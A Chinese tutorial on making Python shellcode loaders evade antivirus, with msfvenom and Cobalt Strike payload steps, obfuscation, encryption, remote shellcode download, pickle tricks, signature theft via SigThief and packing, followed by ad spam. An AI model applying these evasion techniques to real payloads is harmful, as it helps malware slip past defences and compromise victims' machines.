Python免杀技术详解
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode
一
Shellcode加载器
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。
我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。它提供了与C语言兼容的数据类型,并允许调用DLL或共享库中的函数。可使用该模块以纯 Python形式对这些库进行封装。
以下是一个例子:
从上面的代码可以看出,Shellcode加载器一般分为3步:
申请内存->Shellcode写入内存(-> 修改内存属性)->执行该内存。
上面这段代码就是一个经典的Shellcode加载器,主要使用了以下的api:
① VirtualAlloc动态申请内存
② RtlMoveMemory将Shellcode拷贝入申请空间
③ CreateThread创建线程运行
1.加载与执行Shellcode的程序
代码执行完成后,Shellcode加载器就会将buf中的二进制代码放入内存中执行,由于Shellcode本身较为复杂,很难由人来直接编写,所以我们可以借助工具例如cobaltstrike或者msf来得到。我们可以在kali系统中输入指令:
msfvenom -p windows/x64/exec CMD=‘calc.exe’ -f py
这样我们就得到了一段cmd命令执行打开计算器的Shellcode,我们将他替换到下面代码中的的buf中执行即可。代码如下:
最后成功打开计算器
2.生成shllcode
我们来使用CS生成的Shellcode,选择下面的选项:
选择监听器
输出选择64位Python
点击生成后会输出一个payload.py文件,里面的变量buf就是我们的Shellcode。
3.打包生成exe文件
我们可以使用pytinstaller、Nuitka、py2exe等工具来对上面的代码进行打包。以下是一段使用pyinstaller打包的例子:
Pyinstaller -F Shellcodeload.py -i google.ico -w --key=9873121
具体使用参数可以查看官方文档。
由于我们没有进行任何修改,生成的exe文件不具有任何免杀效果,它会轻易的被杀毒软件查杀。为了达到免杀效果,我们需要从多方面去考虑:Shellcode特征、加载器特征、流量特征等等。
二
免杀
1.静态免杀
(1)混淆
既然杀毒软件是通过提取特征码来实现病毒识别的,那么我们就可以添加一些无意义的代码,俗称“花指令”来改变文件的哈希值,或者修改变量名,导入库重命名等等,例如我们可以将:
import ctypes
修改成:
import ctypes as jduvudu312us_usjlq
这样之后的代码就可以使用jduvudu312us_usjlq 来调用ctypes库了
即:
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
和
jduvudu312us_usjlq.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
是等价的,这样我们就可以规避一些特征码的检测。
还有例如buf = b"“,可以写成 ccookkkdasdwwwwwsasssw=b”",或者还可以写入一些无用代码,例如冒泡排序以及多次调用与shellcode加载无关的函数,以下是一个例子:
之后可以多次调用Ge22nw1(int),混淆的代码不影响主代码的运行。诸如此类,作抛砖引玉之用。
(2)编码
编码是数据保存的一种方式,我们可以通过重新编码来绕过特征的检测,例如base64、base32等,以下用base64举例:
我们将上面函数main(buf)内的代码使用base64编码,如下:
这样我们就得到了shellcode加载器的base64编码格式,同样的,我们需要将shellcode也编码一下以规避特征码的检测,这里以计算器为例子:
buf=b"计算器shellcode(见上面代码)"
print(base64.b64decode(buf))
在得到了这些编码过后的代码,我们就可以进行解码执行操作,例如使用exec()函数:
或者使用eval()函数,例如:
注意,在这个过程中,由于我们编码时并未将导入库的操作编码,因此我们需要在文件开头提前把所需要的库导入。
我们还可以进行多次编码,这里不再赘述。
(3)加密
常见的加密方式有很多:Aes,异或,凯撒等,使用的方式其实和上面base64编码差不多,只是将base64替换成对应加密解密即可,在这里不再赘述,这里主要对动态key解密免杀进行讲解。
在常见的加解密中一般都有一个key值,这里以凯撒加密作为例子:
当我们使用凯撒加密时,我们需要指定一个key值,这个值其实可以理解为偏移量,当我们解密时,只需要我们输入正确的偏移量就可以得到明文。
在解密时,这个key值我们通常是知道的,但是在免杀的应用中,如果我们给出了指定的key值或者key值设置的过于简单,那么通常杀软能够逆推出原来的shellcode,对还原后的明文文进行特征检测,这样就失去了加密的意义。
因此我们的解密过程我们可以实现动态key解密,一个常见的例子是:我们可以使用时间撞库的方式多次解密,只要有一次得到了正确的key,就能成功执行shellcode中的内容(假设我们的key的值为7)例如(伪代码):
在10000次撞库中,概率学上来说终究有一次循环中key=7,因此在这次循环中我们就可以执行正确还原后shellcode。
不只是key,我们同样可以在已经加密的shellcode中插入无用字符,通过时间撞库的方式还原,例如:
buf=“计算器shellcode前1/3”+“混淆例如ncoioqjdoqwj”+“计算器shellcode中1/3”+“混淆例如ncoioqjdoqwj”+“计算器shellcode后1/3”+“混淆例如ncoioqjdoqwj”
通过时间撞库解密(伪代码):
For i in range(10000):
random.seed=time.time
set = random.randint(0,20)
shellcode = buf[:前1/3]+buf[前1/3+set:后1/3-set]+buf[后1/3:]
try:
exec(mimaxue_decode(shellcode,key))
except:
pass
值得注意的是,由于解密通常需要一定时间,时间撞库的方式通常通常可以规避一定的行为检测。同样,这里我们可以进行多次嵌套加密,也可以使用复杂度的更高的加密算法,以避免杀软逆推出原本的shllcode。
(4)文件分离和应用
我们可以将整个shellcode加载器分为两个部分,下载shellcode和执行。加载器除了加载大马外并无其他作用。但是直接执行大马会被检测到,所以需要用到分离免杀。
我们可以通过各种方式来做文件分离,例如python的request库、socket通信等,这个过程我们同样需要进行混淆和加密来避免特征,尤其是shellcode。
以下是一个例子:
aaascasca =requests.get(“http://127.0.0.1/sc.txt”).text.encode()
我们通过requests库来远程获取shellcode,这样就可以将shellcode代码保存在远程服务器上,避免文件落地,同时也减小了文件大小。我们还可以对远程下载的shellcode进行加密,等下载到本地后再进行还原,以下是一个例子:(伪代码,仅展现思路,结合混淆和加密)
这里只做了两次次加密,事实上可以将key的值隐藏,并且进行多次加密,可能的话,可以加解密10次甚至20次并设置睡眠时间,以规避杀软检测。
但是也有些杀软会对下载解密的行为报毒,可以将shellcode加载器存放在本地以时间撞库的方式解密,只将shellcode存放在服务器上,等到加载器解密完成再下载shellcode直接写进内存。
(5)反序列化
有些杀软会将部分函数列为高危函数,那么当调用该函数时就容易触发查杀,但是有些函数我们有时候又无法避免使用,这个时候就可以将其序列化并加密,之后使用时再通过自定义的解密方式反序列化调用python有两个模块处理序列化操作 pickle模块与json模块。
这两个模块都提供了dump,dumps ,load ,loads 方法来进行序列化与反序列化操作。其中dump与load方法配套使用,dumps与loads方法配套使用。
这里我们使用pickle库将exec序列化:
输出:
我们这里可以对输出进行加密,类似于:
def encrypt(input_bytes, key):
。。。。。。
return output
def decrypt(output_bytes, key):
。。。。。。
return input
实际应用:
在上面的代码中我们用 pickle.loads 反序列化执行 “HHHHHA = exec”,HHHHHA 变成exec函数,再执行解密后的shellcode加载器。这个过程可以加入上面的混淆、加密、分离的思路,这里不再赘述。
(6)签名
签名是一种数字签名证书,给python打包的exe签名至少可以减少一半的报毒,我们这里使用的是sigthief工具。
地址:
https://github.com/secretsquirrel/SigThief
使用方式:
./sigthief.py-i 360.exe -t shellcodeloader.exe -o /result/ shellcodeloader.exe
具体参数可以查看github文档
这样我们就将360的签名窃取下来了,或者我们还可以使用微软的SignTool来生成一个无效的签名,只要杀软没有对签名进行验证,那么就可以一定程度上规避检测。
(7)加壳
加壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。
加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,容易被杀软检测。
面对这种情况可以考虑用一些冷门的加密壳,特别是对于不开源的PE文件,通过加壳可以绕过很多特征码识别。
题外话
当下这个大数据时代不掌握一门编程语言怎么跟的上时代呢?当下最火的编程语言Python前景一片光明!如果你也想跟上时代提升自己那么请看一下.
感兴趣的小伙伴,赠送全套Python学习资料,包含面试题、简历资料等具体看下方。
👉CSDN大礼包🎁:全网最全《Python学习资料》免费赠送🆓!(安全链接,放心点击)
一、Python所有方向的学习路线
Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照下面的知识点去找对应的学习资源,保证自己学得较为全面。
二、Python必备开发工具
工具都帮大家整理好了,安装就可直接上手!
三、最新Python学习笔记
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
四、Python视频合集
观看全面零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
五、实战案例
纸上得来终觉浅,要学会跟着视频一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
六、面试宝典
简历模板
👉CSDN大礼包🎁:全网最全《Python学习资料》免费赠送🆓!(安全链接,放心点击)
若有侵权,请联系删除
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
所有评论(0)